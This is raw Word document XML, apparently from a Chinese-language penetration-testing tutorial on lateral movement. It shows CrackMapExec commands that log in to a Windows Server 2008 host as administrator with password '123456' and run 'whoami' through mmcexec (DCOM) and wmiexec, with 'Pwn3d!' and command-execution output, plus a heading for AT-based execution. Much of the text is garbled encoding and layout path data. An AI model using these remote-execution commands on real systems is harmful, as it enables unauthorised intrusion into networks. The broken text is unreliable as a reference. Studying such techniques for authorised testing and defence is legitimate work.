          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>.6</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:spacing w:val="3"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:color w:val="980053"/>
          <w:spacing w:val="3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WIN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5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BMI9HGC42S</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:spacing w:val="3"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial Unicode MS" w:hAnsi="Arial Unicode MS" w:cs="Arial Unicode MS" w:eastAsia="Arial Unicode MS"/>
          <w:color w:val="404549"/>
          <w:spacing w:val="6"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>����������</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:color w:val="404549"/>
          <w:spacing w:val="11"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>ϣ</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial Unicode MS" w:hAnsi="Arial Unicode MS" w:cs="Arial Unicode MS" w:eastAsia="Arial Unicode MS"/>
          <w:color w:val="404549"/>
          <w:spacing w:val="6"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>�������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һ</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial Unicode MS" w:hAnsi="Arial Unicode MS" w:cs="Arial Unicode MS" w:eastAsia="Arial Unicode MS"/>
          <w:color w:val="404549"/>
          <w:spacing w:val="7"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>�</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial Unicode MS" w:hAnsi="Arial Unicode MS" w:cs="Arial Unicode MS" w:eastAsia="Arial Unicode MS"/>
          <w:color w:val="404549"/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>����</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial Unicode MS" w:hAnsi="Arial Unicode MS" w:cs="Arial Unicode MS" w:eastAsia="Arial Unicode MS"/>
          <w:color w:val="404549"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>�����</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="0" w:line="148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10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66" w:lineRule="exact"/>
        <w:ind w:left="0" w:right="0"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:autoSpaceDE w:val="0"/>
        <w:autoSpaceDN w:val="0"/>
        <w:spacing w:before="0" w:after="0" w:line="183" w:lineRule="auto"/>
        <w:ind w:left="1120" w:right="0" w:firstLine="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial Unicode MS" w:hAnsi="Arial Unicode MS" w:cs="Arial Unicode MS" w:eastAsia="Arial Unicode MS"/>
          <w:color w:val="000000"/>
          <w:spacing w:val="11"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>基于dco</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial Unicode MS" w:hAnsi="Arial Unicode MS" w:cs="Arial Unicode MS" w:eastAsia="Arial Unicode MS"/>
          <w:color w:val="000000"/>
          <w:spacing w:val="10"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>m执行Command</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="0" w:line="200" w:lineRule="exact"/>
        <w:ind w:left="0" w:right="0"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="0" w:line="378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root</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:color w:val="ec9800"/>
          <w:spacing w:val="6"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>@John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~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cme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192.168.1.6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8"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>‐u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administrator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9"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>‐p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'123456'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‐‐exec‐m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ethod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mmcexec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‐x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'whoami'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.6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5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BMI9HGC42S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Windows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Web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Server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2008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R2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760</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="31" w:after="0" w:line="235" w:lineRule="auto"/>
        <w:ind w:left="1720" w:right="1324" w:firstLine="0"/>
      </w:pP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x64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name:WIN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5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BMI9HGC42S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domain:WIN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5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BMI9HGC42S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signing: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False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SM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Bv1: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True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4550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.6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5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BMI9HGC42S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+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5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BMI9HGC42S\administrator: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123456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Pwn3d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!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)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4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.6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5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BMI9HGC42S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+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Executed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command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via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mmcexec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8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.6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5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BMI9HGC42S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win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5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bmi9hgc42s\administrator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15" w:lineRule="exact"/>
        <w:ind w:left="0" w:right="0"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:autoSpaceDE w:val="0"/>
        <w:autoSpaceDN w:val="0"/>
        <w:spacing w:before="0" w:after="0" w:line="183" w:lineRule="auto"/>
        <w:ind w:left="1120" w:right="0" w:firstLine="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial Unicode MS" w:hAnsi="Arial Unicode MS" w:cs="Arial Unicode MS" w:eastAsia="Arial Unicode MS"/>
          <w:color w:val="000000"/>
          <w:spacing w:val="11"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>基于wmi执行Comm</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial Unicode MS" w:hAnsi="Arial Unicode MS" w:cs="Arial Unicode MS" w:eastAsia="Arial Unicode MS"/>
          <w:color w:val="000000"/>
          <w:spacing w:val="10"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>and</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="0" w:line="200" w:lineRule="exact"/>
        <w:ind w:left="0" w:right="0"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="0" w:line="378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root</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:color w:val="ec9800"/>
          <w:spacing w:val="6"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>@John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~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cme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192.168.1.6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8"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>‐u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administrator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9"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>‐p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'123456'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‐‐exec‐m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ethod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wmiexec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‐x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'whoami'</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="0" w:line="14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.6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5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BMI9HGC42S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Windows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Web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Server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2008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R2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760</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="31" w:after="0" w:line="235" w:lineRule="auto"/>
        <w:ind w:left="1720" w:right="1324" w:firstLine="0"/>
      </w:pP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x64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name:WIN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5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BMI9HGC42S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domain:WIN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5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BMI9HGC42S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signing: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False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SM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Bv1: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True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4550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.6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5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BMI9HGC42S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+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5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BMI9HGC42S\administrator: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123456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Pwn3d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!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)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="0" w:line="14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4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.6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5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BMI9HGC42S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+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Executed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command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via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wmiexec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8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.6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5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BMI9HGC42S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win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5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bmi9hgc42s\administrator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05" w:lineRule="exact"/>
        <w:ind w:left="0" w:right="0"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:autoSpaceDE w:val="0"/>
        <w:autoSpaceDN w:val="0"/>
        <w:spacing w:before="0" w:after="0" w:line="183" w:lineRule="auto"/>
        <w:ind w:left="1120" w:right="0" w:firstLine="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial Unicode MS" w:hAnsi="Arial Unicode MS" w:cs="Arial Unicode MS" w:eastAsia="Arial Unicode MS"/>
          <w:color w:val="000000"/>
          <w:spacing w:val="8"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>基于AT执行</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial Unicode MS" w:hAnsi="Arial Unicode MS" w:cs="Arial Unicode MS" w:eastAsia="Arial Unicode MS"/>
          <w:color w:val="000000"/>
          <w:spacing w:val="6"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Command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19.500pt;margin-top:126.500pt;width:0.500pt;height:129.500pt;mso-position-horizontal-relative:page;mso-position-vertical-relative:page;z-index:-10" coordorigin="10390,2530" coordsize="10,2590">
        <v:shape style="position:absolute;left:10390;top:2530;width:10;height:2590" coordorigin="10390,2530" coordsize="10,2590" path="m10402,2545l10402,2545,10402,2545,10402,2545,10402,2545,10402,2545,10402,2545,10402,2546,10402,2546,10402,2546,10402,2546,10402,2547,10402,2547,10402,2548,10402,2549,10402,2549,10402,2550,10402,2552,10402,2553,10402,2554,10402,2556,10402,2558,10402,2559,10402,2562,10402,2564,10402,2566,10402,2569,10402,2572,10402,2575,10402,2579,10402,2583,10402,2587,10402,2591,10402,2595,10402,2600,10402,2605,10402,2611,10402,2617,10402,2623,10402,2629,10402,2636,10402,2643,10402,2651,10402,2659,10402,2667,10402,2676,10402,2685,10402,2694,10402,2704,10402,2715,10402,2725,10402,2737,10402,2748,10402,2761,10402,2773,10402,2786,10402,2800,10402,2814,10402,2829,10402,2844,10402,2860,10402,2876,10402,2893,10402,2910,10402,2928,10402,2947,10402,2966,10402,2986,10402,3006,10402,3027,10402,3048,10402,3071,10402,3094,10402,3117,10402,3141,10402,3166,10402,3192,10402,3218,10402,3245,10402,3272,10402,3301,10402,3330,10402,3359,10402,3390,10402,3421,10402,3453,10402,3486,10402,3520,10402,3554,10402,3589,10402,3625,10402,3662,10402,3700,10402,3738,10402,3777,10402,3818,10402,3859,10402,3901,10402,3943,10402,3987,10402,4032,10402,4077,10402,4123,10402,4171,10402,4219,10402,4268,10402,4319,10402,4370,10402,4422,10402,4475,10402,4529,10402,4584,10402,4640,10402,4697,10402,4755,10402,4815,10402,4875,10402,4936,10402,4999,10402,5062,10402,5127e" filled="f" stroked="t" strokeweight="0.750pt" strokecolor="#e6e8eb">
          <v:path arrowok="t"/>
        </v:shape>
      </v:group>
    </w:pict>
    <w:pict>
      <v:group style="position:absolute;margin-left:74.500pt;margin-top:126.500pt;width:449.500pt;height:33.500pt;mso-position-horizontal-relative:page;mso-position-vertical-relative:page;z-index:-10" coordorigin="1490,2530" coordsize="8990,670">
        <v:shape style="position:absolute;left:1490;top:2530;width:8990;height:670" coordorigin="1490,2530" coordsize="8990,670" path="m1510,2545l1510,2545,1510,2545,1510,2545,1510,2545,1510,2545,1510,2545,1511,2545,1512,2545,1512,2545,1514,2545,1515,2545,1517,2545,1519,2545,1521,2545,1524,2545,1528,2545,1532,2545,1536,2545,1541,2545,1546,2545,1552,2545,1559,2545,1566,2545,1575,2545,1583,2545,1593,2545,1603,2545,1615,2545,1627,2545,1640,2545,1654,2545,1668,2545,1684,2545,1701,2545,1719,2545,1738,2545,1758,2545,1780,2545,1802,2545,1826,2545,1851,2545,1877,2545,1904,2545,1933,2545,1963,2545,1995,2545,2028,2545,2063,2545,2099,2545,2136,2545,2175,2545,2216,2545,2259,2545,2303,2545,2348,2545,2396,2545,2445,2545,2496,2545,2549,2545,2604,2545,2660,2545,2719,2545,2779,2545,2841,2545,2906,2545,2972,2545,3041,2545,3112,2545,3184,2545,3259,2545,3336,2545,3416,2545,3498,2545,3582,2545,3668,2545,3757,2545,3848,2545,3941,2545,4037,2545,4136,2545,4236,2545,4340,2545,4446,2545,4555,2545,4666,2545,4780,2545,4897,2545,5017,2545,5139,2545,5264,2545,5392,2545,5523,2545,5657,2545,5793,2545,5933,2545,6076,2545,6222,2545,6370,2545,6522,2545,6677,2545,6835,2545,6997,2545,7161,2545,7329,2545,7500,2545,7675,2545,7853,2545,8034,2545,8219,2545,8407,2545,8598,2545,8793,2545,8992,2545,9194,2545,9400,2545,9609,2545,9823,2545,10039,2545,10260,2545,10484,2545,10484,2545,10484,2545,10484,2545,10484,2545,10484,2545,10484,2545,10484,2545,10484,2545,10484,2545,10484,2546,10484,2546,10484,2546,10484,2546,10484,2546,10484,2546,10484,2547,10484,2547,10484,2547,10484,2548,10484,2548,10484,2548,10484,2549,10484,2549,10484,2550,10484,2551,10484,2551,10484,2552,10484,2553,10484,2554,10484,2555,10484,2556,10484,2557,10484,2558,10484,2559,10484,2561,10484,2562,10484,2564,10484,2565,10484,2567,10484,2569,10484,2570,10484,2572,10484,2574,10484,2576,10484,2579,10484,2581,10484,2583,10484,2586,10484,2589,10484,2591,10484,2594,10484,2597,10484,2600,10484,2604,10484,2607,10484,2610,10484,2614,10484,2618,10484,2622,10484,2626,10484,2630,10484,2634,10484,2639,10484,2643,10484,2648,10484,2653,10484,2658,10484,2663,10484,2668,10484,2674,10484,2680,10484,2686,10484,2692,10484,2698,10484,2704,10484,2711,10484,2717,10484,2724,10484,2731,10484,2738,10484,2746,10484,2754,10484,2761,10484,2769,10484,2778,10484,2786,10484,2795,10484,2803,10484,2812,10484,2822,10484,2831,10484,2841,10484,2850,10484,2860,10484,2871,10484,2881,10484,2892,10484,2903,10484,2914,10484,2925,10484,2937,10484,2949,10484,2961,10484,2973,10484,2986,10484,2999,10484,3012,10484,3025,10484,3039,10484,3053,10484,3067,10484,3081,10484,3096,10484,3111,10484,3126,10484,3141,10484,3157,10484,3173,10484,3189,10484,3206,10484,3206,10484,3206,10484,3206,10484,3206,10484,3206,10484,3206,10483,3206,10482,3206,10482,3206,10480,3206,10479,3206,10477,3206,10475,3206,10473,3206,10470,3206,10466,3206,10462,3206,10458,3206,10453,3206,10448,3206,10442,3206,10435,3206,10428,3206,10419,3206,10411,3206,10401,3206,10391,3206,10379,3206,10367,3206,10354,3206,10340,3206,10326,3206,10310,3206,10293,3206,10275,3206,10256,3206,10236,3206,10215,3206,10192,3206,10168,3206,10143,3206,10117,3206,10090,3206,10061,3206,10031,3206,9999,3206,9966,3206,9931,3206,9895,3206,9858,3206,9819,3206,9778,3206,9735,3206,9691,3206,9646,3206,9598,3206,9549,3206,9498,3206,9445,3206,9391,3206,9334,3206,9275,3206,9215,3206,9153,3206,9088,3206,9022,3206,8953,3206,8883,3206,8810,3206,8735,3206,8658,3206,8578,3206,8497,3206,8413,3206,8326,3206,8238,3206,8146,3206,8053,3206,7957,3206,7859,3206,7758,3206,7654,3206,7548,3206,7439,3206,7328,3206,7214,3206,7097,3206,6977,3206,6855,3206,6730,3206,6602,3206,6471,3206,6337,3206,6201,3206,6061,3206,5918,3206,5773,3206,5624,3206,5472,3206,5317,3206,5159,3206,4997,3206,4833,3206,4665,3206,4494,3206,4319,3206,4141,3206,3960,3206,3776,3206,3587,3206,3396,3206,3201,3206,3002,3206,2800,3206,2594,3206,2385,3206,2172,3206,1955,3206,1734,3206,1510,3206,1510,3206,1510,3206,1510,3206,1510,3206,1510,3206,1510,3206,1510,3206,1510,3205,1510,3205,1510,3205,1510,3205,1510,3205,1510,3205,1510,3205,1510,3205,1510,3204,1510,3204,1510,3204,1510,3203,1510,3203,1510,3202,1510,3202,1510,3201,1510,3201,1510,3200,1510,3199,1510,3199,1510,3198,1510,3197,1510,3196,1510,3195,1510,3194,1510,3193,1510,3192,1510,3190,1510,3189,1510,3187,1510,3186,1510,3184,1510,3182,1510,3181,1510,3179,1510,3177,1510,3174,1510,3172,1510,3170,1510,3167,1510,3165,1510,3162,1510,3160,1510,3157,1510,3154,1510,3151,1510,3147,1510,3144,1510,3140,1510,3137,1510,3133,1510,3129,1510,3125,1510,3121,1510,3117,1510,3112,1510,3108,1510,3103,1510,3098,1510,3093,1510,3088,1510,3082,1510,3077,1510,3071,1510,3065,1510,3059,1510,3053,1510,3047,1510,3040,1510,3034,1510,3027,1510,3020,1510,3012,1510,3005,1510,2997,1510,2990,1510,2982,1510,2973,1510,2965,1510,2956,1510,2948,1510,2939,1510,2929,1510,2920,1510,2910,1510,2900,1510,2890,1510,2880,1510,2870,1510,2859,1510,2848,1510,2837,1510,2825,1510,2814,1510,2802,1510,2790,1510,2777,1510,2765,1510,2752,1510,2739,1510,2726,1510,2712,1510,2698,1510,2684,1510,2670,1510,2655,1510,2640,1510,2625,1510,2610,1510,2594,1510,2578,1510,2562,1510,2545e x" fillcolor="#f6f6f6" stroke="f">
          <v:path arrowok="t"/>
        </v:shape>
      </v:group>
    </w:pict>
    <w:pict>
      <v:shape style="position:absolute;margin-left:74.400pt;margin-top:126.600pt;width:445.800pt;height:33.600pt;mso-position-horizontal-relative:page;mso-position-vertical-relative:page;z-index:-10" type="#_x0000_t75">
        <v:imagedata r:id="rId32" o:title=""/>
      </v:shape>
    </w:pict>
    <w:pict>
      <v:group style="position:absolute;margin-left:74.500pt;margin-top:159.500pt;width:449.500pt;height:45.500pt;mso-position-horizontal-relative:page;mso-position-vertical-relative:page;z-index:-10" coordorigin="1490,3190" coordsize="8990,910">
        <v:shape style="position:absolute;left:1490;top:3190;width:8990;height:910" coordorigin="1490,3190" coordsize="8990,910" path="m1510,3206l1510,3206,1510,3206,1510,3206,1510,3206,1510,3206,1510,3206,1511,3206,1512,3206,1512,3206,1514,3206,1515,3206,1517,3206,1519,3206,1521,3206,1524,3206,1528,3206,1532,3206,1536,3206,1541,3206,1546,3206,1552,3206,1559,3206,1566,3206,1575,3206,1583,3206,1593,3206,1603,3206,1615,3206,1627,3206,1640,3206,1654,3206,1668,3206,1684,3206,1701,3206,1719,3206,1738,3206,1758,3206,1780,3206,1802,3206,1826,3206,1851,3206,1877,3206,1904,3206,1933,3206,1963,3206,1995,3206,2028,3206,2063,3206,2099,3206,2136,3206,2175,3206,2216,3206,2259,3206,2303,3206,2348,3206,2396,3206,2445,3206,2496,3206,2549,3206,2604,3206,2660,3206,2719,3206,2779,3206,2841,3206,2906,3206,2972,3206,3041,3206,3112,3206,3184,3206,3259,3206,3336,3206,3416,3206,3498,3206,3582,3206,3668,3206,3757,3206,3848,3206,3941,3206,4037,3206,4136,3206,4236,3206,4340,3206,4446,3206,4555,3206,4666,3206,4780,3206,4897,3206,5017,3206,5139,3206,5264,3206,5392,3206,5523,3206,5657,3206,5793,3206,5933,3206,6076,3206,6222,3206,6370,3206,6522,3206,6677,3206,6835,3206,6997,3206,7161,3206,7329,3206,7500,3206,7675,3206,7853,3206,8034,3206,8219,3206,8407,3206,8598,3206,8793,3206,8992,3206,9194,3206,9400,3206,9609,3206,9823,3206,10039,3206,10260,3206,10484,3206,10484,3206,10484,3206,10484,3206,10484,3206,10484,3206,10484,3206,10484,3206,10484,3206,10484,3206,10484,3206,10484,3206,10484,3206,10484,3207,10484,3207,10484,3207,10484,3207,10484,3208,10484,3208,10484,3209,10484,3209,10484,3210,10484,3211,10484,3211,10484,3212,10484,3213,10484,3214,10484,3215,10484,3216,10484,3217,10484,3219,10484,3220,10484,3222,10484,3223,10484,3225,10484,3227,10484,3229,10484,3231,10484,3233,10484,3235,10484,3237,10484,3240,10484,3242,10484,3245,10484,3248,10484,3251,10484,3254,10484,3258,10484,3261,10484,3265,10484,3268,10484,3272,10484,3276,10484,3281,10484,3285,10484,3290,10484,3295,10484,3299,10484,3305,10484,3310,10484,3315,10484,3321,10484,3327,10484,3333,10484,3339,10484,3346,10484,3352,10484,3359,10484,3366,10484,3374,10484,3381,10484,3389,10484,3397,10484,3405,10484,3413,10484,3422,10484,3431,10484,3440,10484,3450,10484,3459,10484,3469,10484,3479,10484,3490,10484,3500,10484,3511,10484,3522,10484,3534,10484,3545,10484,3557,10484,3570,10484,3582,10484,3595,10484,3608,10484,3622,10484,3635,10484,3649,10484,3664,10484,3678,10484,3693,10484,3709,10484,3724,10484,3740,10484,3756,10484,3773,10484,3790,10484,3807,10484,3824,10484,3842,10484,3860,10484,3879,10484,3898,10484,3917,10484,3936,10484,3956,10484,3977,10484,3997,10484,4018,10484,4040,10484,4061,10484,4084,10484,4106,10484,4106,10484,4106,10484,4106,10484,4106,10484,4106,10484,4106,10483,4106,10482,4106,10482,4106,10480,4106,10479,4106,10477,4106,10475,4106,10473,4106,10470,4106,10466,4106,10462,4106,10458,4106,10453,4106,10448,4106,10442,4106,10435,4106,10428,4106,10419,4106,10411,4106,10401,4106,10391,4106,10379,4106,10367,4106,10354,4106,10340,4106,10326,4106,10310,4106,10293,4106,10275,4106,10256,4106,10236,4106,10215,4106,10192,4106,10168,4106,10143,4106,10117,4106,10090,4106,10061,4106,10031,4106,9999,4106,9966,4106,9931,4106,9895,4106,9858,4106,9819,4106,9778,4106,9735,4106,9691,4106,9646,4106,9598,4106,9549,4106,9498,4106,9445,4106,9391,4106,9334,4106,9275,4106,9215,4106,9153,4106,9088,4106,9022,4106,8953,4106,8883,4106,8810,4106,8735,4106,8658,4106,8578,4106,8497,4106,8413,4106,8326,4106,8238,4106,8146,4106,8053,4106,7957,4106,7859,4106,7758,4106,7654,4106,7548,4106,7439,4106,7328,4106,7214,4106,7097,4106,6977,4106,6855,4106,6730,4106,6602,4106,6471,4106,6337,4106,6201,4106,6061,4106,5918,4106,5773,4106,5624,4106,5472,4106,5317,4106,5159,4106,4997,4106,4833,4106,4665,4106,4494,4106,4319,4106,4141,4106,3960,4106,3776,4106,3587,4106,3396,4106,3201,4106,3002,4106,2800,4106,2594,4106,2385,4106,2172,4106,1955,4106,1734,4106,1510,4106,1510,4106,1510,4106,1510,4106,1510,4106,1510,4106,1510,4106,1510,4106,1510,4106,1510,4106,1510,4106,1510,4106,1510,4105,1510,4105,1510,4105,1510,4105,1510,4104,1510,4104,1510,4103,1510,4103,1510,4102,1510,4102,1510,4101,1510,4100,1510,4100,1510,4099,1510,4098,1510,4097,1510,4096,1510,4094,1510,4093,1510,4092,1510,4090,1510,4089,1510,4087,1510,4085,1510,4083,1510,4081,1510,4079,1510,4077,1510,4074,1510,4072,1510,4069,1510,4066,1510,4064,1510,4061,1510,4057,1510,4054,1510,4051,1510,4047,1510,4043,1510,4039,1510,4035,1510,4031,1510,4027,1510,4022,1510,4017,1510,4012,1510,4007,1510,4002,1510,3996,1510,3991,1510,3985,1510,3979,1510,3972,1510,3966,1510,3959,1510,3952,1510,3945,1510,3938,1510,3931,1510,3923,1510,3915,1510,3907,1510,3898,1510,3890,1510,3881,1510,3872,1510,3862,1510,3852,1510,3843,1510,3832,1510,3822,1510,3811,1510,3801,1510,3789,1510,3778,1510,3766,1510,3754,1510,3742,1510,3729,1510,3717,1510,3703,1510,3690,1510,3676,1510,3662,1510,3648,1510,3633,1510,3618,1510,3603,1510,3588,1510,3572,1510,3556,1510,3539,1510,3522,1510,3505,1510,3487,1510,3470,1510,3451,1510,3433,1510,3414,1510,3395,1510,3375,1510,3355,1510,3335,1510,3314,1510,3293,1510,3272,1510,3250,1510,3228,1510,3206e x" fillcolor="#f6f6f6" stroke="f">
          <v:path arrowok="t"/>
        </v:shape>
      </v:group>
    </w:pict>
    <w:pict>
      <v:group style="position:absolute;margin-left:74.500pt;margin-top:159.500pt;width:1.500pt;height:45.500pt;mso-position-horizontal-relative:page;mso-position-vertical-relative:page;z-index:-10" coordorigin="1490,3190" coordsize="30,910">
        <v:shape style="position:absolute;left:1490;top:3190;width:30;height:910" coordorigin="1490,3190" coordsize="30,910" path="m1517,3206l1517,3206,1517,3206,1517,3206,1517,3206,1517,3206,1517,3206,1517,3206,1517,3206,1517,3206,1517,3206,1517,3206,1517,3206,1517,3207,1517,3207,1517,3207,1517,3207,1517,3208,1517,3208,1517,3209,1517,3209,1517,3210,1517,3211,1517,3211,1517,3212,1517,3213,1517,3214,1517,3215,1517,3216,1517,3217,1517,3219,1517,3220,1517,3222,1517,3223,1517,3225,1517,3227,1517,3229,1517,3231,1517,3233,1517,3235,1517,3237,1517,3240,1517,3242,1517,3245,1517,3248,1517,3251,1517,3254,1517,3258,1517,3261,1517,3265,1517,3268,1517,3272,1517,3276,1517,3281,1517,3285,1517,3290,1517,3295,1517,3299,1517,3305,1517,3310,1517,3315,1517,3321,1517,3327,1517,3333,1517,3339,1517,3346,1517,3352,1517,3359,1517,3366,1517,3374,1517,3381,1517,3389,1517,3397,1517,3405,1517,3413,1517,3422,1517,3431,1517,3440,1517,3450,1517,3459,1517,3469,1517,3479,1517,3490,1517,3500,1517,3511,1517,3522,1517,3534,1517,3545,1517,3557,1517,3570,1517,3582,1517,3595,1517,3608,1517,3622,1517,3635,1517,3649,1517,3664,1517,3678,1517,3693,1517,3709,1517,3724,1517,3740,1517,3756,1517,3773,1517,3790,1517,3807,1517,3824,1517,3842,1517,3860,1517,3879,1517,3898,1517,3917,1517,3936,1517,3956,1517,3977,1517,3997,1517,4018,1517,4040,1517,4061,1517,4084,1517,4106e" filled="f" stroked="t" strokeweight="0.750pt" strokecolor="#e6e8eb">
          <v:path arrowok="t"/>
        </v:shape>
      </v:group>
    </w:pict>
    <w:pict>
      <v:group style="position:absolute;margin-left:74.500pt;margin-top:204.500pt;width:449.500pt;height:32.500pt;mso-position-horizontal-relative:page;mso-position-vertical-relative:page;z-index:-10" coordorigin="1490,4090" coordsize="8990,650">
        <v:shape style="position:absolute;left:1490;top:4090;width:8990;height:650" coordorigin="1490,4090" coordsize="8990,650" path="m1510,4106l1510,4106,1510,4106,1510,4106,1510,4106,1510,4106,1510,4106,1511,4106,1512,4106,1512,4106,1514,4106,1515,4106,1517,4106,1519,4106,1521,4106,1524,4106,1528,4106,1532,4106,1536,4106,1541,4106,1546,4106,1552,4106,1559,4106,1566,4106,1575,4106,1583,4106,1593,4106,1603,4106,1615,4106,1627,4106,1640,4106,1654,4106,1668,4106,1684,4106,1701,4106,1719,4106,1738,4106,1758,4106,1780,4106,1802,4106,1826,4106,1851,4106,1877,4106,1904,4106,1933,4106,1963,4106,1995,4106,2028,4106,2063,4106,2099,4106,2136,4106,2175,4106,2216,4106,2259,4106,2303,4106,2348,4106,2396,4106,2445,4106,2496,4106,2549,4106,2604,4106,2660,4106,2719,4106,2779,4106,2841,4106,2906,4106,2972,4106,3041,4106,3112,4106,3184,4106,3259,4106,3336,4106,3416,4106,3498,4106,3582,4106,3668,4106,3757,4106,3848,4106,3941,4106,4037,4106,4136,4106,4236,4106,4340,4106,4446,4106,4555,4106,4666,4106,4780,4106,4897,4106,5017,4106,5139,4106,5264,4106,5392,4106,5523,4106,5657,4106,5793,4106,5933,4106,6076,4106,6222,4106,6370,4106,6522,4106,6677,4106,6835,4106,6997,4106,7161,4106,7329,4106,7500,4106,7675,4106,7853,4106,8034,4106,8219,4106,8407,4106,8598,4106,8793,4106,8992,4106,9194,4106,9400,4106,9609,4106,9823,4106,10039,4106,10260,4106,10484,4106,10484,4106,10484,4106,10484,4106,10484,4106,10484,4106,10484,4106,10484,4106,10484,4106,10484,4106,10484,4106,10484,4106,10484,4107,10484,4107,10484,4107,10484,4107,10484,4107,10484,4108,10484,4108,10484,4108,10484,4109,10484,4109,10484,4110,10484,4110,10484,4111,10484,4111,10484,4112,10484,4113,10484,4114,10484,4114,10484,4115,10484,4116,10484,4117,10484,4119,10484,4120,10484,4121,10484,4122,10484,4124,10484,4125,10484,4127,10484,4129,10484,4131,10484,4132,10484,4134,10484,4137,10484,4139,10484,4141,10484,4143,10484,4146,10484,4148,10484,4151,10484,4154,10484,4157,10484,4160,10484,4163,10484,4166,10484,4170,10484,4173,10484,4177,10484,4181,10484,4185,10484,4189,10484,4193,10484,4197,10484,4202,10484,4206,10484,4211,10484,4216,10484,4221,10484,4226,10484,4232,10484,4237,10484,4243,10484,4249,10484,4255,10484,4261,10484,4268,10484,4274,10484,4281,10484,4288,10484,4295,10484,4302,10484,4310,10484,4317,10484,4325,10484,4333,10484,4341,10484,4350,10484,4358,10484,4367,10484,4376,10484,4385,10484,4395,10484,4404,10484,4414,10484,4424,10484,4434,10484,4445,10484,4456,10484,4466,10484,4478,10484,4489,10484,4501,10484,4512,10484,4525,10484,4537,10484,4549,10484,4562,10484,4575,10484,4588,10484,4602,10484,4616,10484,4630,10484,4644,10484,4659,10484,4673,10484,4688,10484,4704,10484,4719,10484,4735,10484,4751,10484,4751,10484,4751,10484,4751,10484,4751,10484,4751,10484,4751,10483,4751,1048